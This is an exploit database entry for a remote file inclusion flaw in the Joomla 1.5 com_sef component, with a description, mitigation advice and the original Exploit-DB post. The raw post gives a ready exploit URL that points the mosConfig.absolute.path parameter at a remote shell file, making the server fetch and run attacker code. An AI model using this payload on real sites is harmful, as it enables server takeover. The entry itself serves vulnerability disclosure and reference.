Joomla Component (com_sef) RFI

vendor:

Joomla

by:

Li0n-PaL

8,8

CVSS

HIGH

Remote File Inclusion (RFI)

CWE

Product Name: Joomla

Affected Version From: Joomla 1.5.x

Affected Version To: Joomla 1.5.x

Patch Exists: YES

Related CWE: N/A

CPE: a:joomla:joomla

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: All

2009

Joomla Component (com_sef) RFI

A Remote File Inclusion (RFI) vulnerability exists in Joomla Component (com_sef) which allows an attacker to include a remote file by manipulating the 'mosConfig.absolute.path' parameter. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable application. This can result in the execution of arbitrary code on the vulnerable system.

Mitigation:

The best way to mitigate RFI attacks is to restrict the types of files that can be included. This can be done by using a whitelist of allowed file extensions. Additionally, input validation should be used to detect attempts to use directory traversal characters (such as “../”) in order to access files outside of the intended directory.

Source

Exploit-DB raw data:

==========================================================
Joomla Component (com_sef) RFI
===========================================================

                                          WWw.HaCkTeacH.oRg/cc
                                                                                         
+===================================================================================+
[?]Joomla Component (com_sef) RFI
+===================================================================================+
    [?] My home:              [http://HaCkTeCh.Org/cc           ]
    [?] For Ask:              [F5w@hotmail.com                   ]
    [?] Script:               [     joomla                ]
    [?] home Script           [ http://www.joomla.com/app             ]
    [?] Language:             [ PHP                              ]
    [?] Founder:              [ Li0n-PaL                         ]
    [?] Gr44tz to:            [ Pal-Li0n - Red-D3v1L - Shadow-D3v1L - All HaCkTeacH CreW ]

===[ Exploit  ]===
http://localhost/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=[shell.txt?]

DeMo ~

http://www.example.com/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://[remote-server]/[file]%00


EnJoY o_O

---------------------------------------------------------

./exit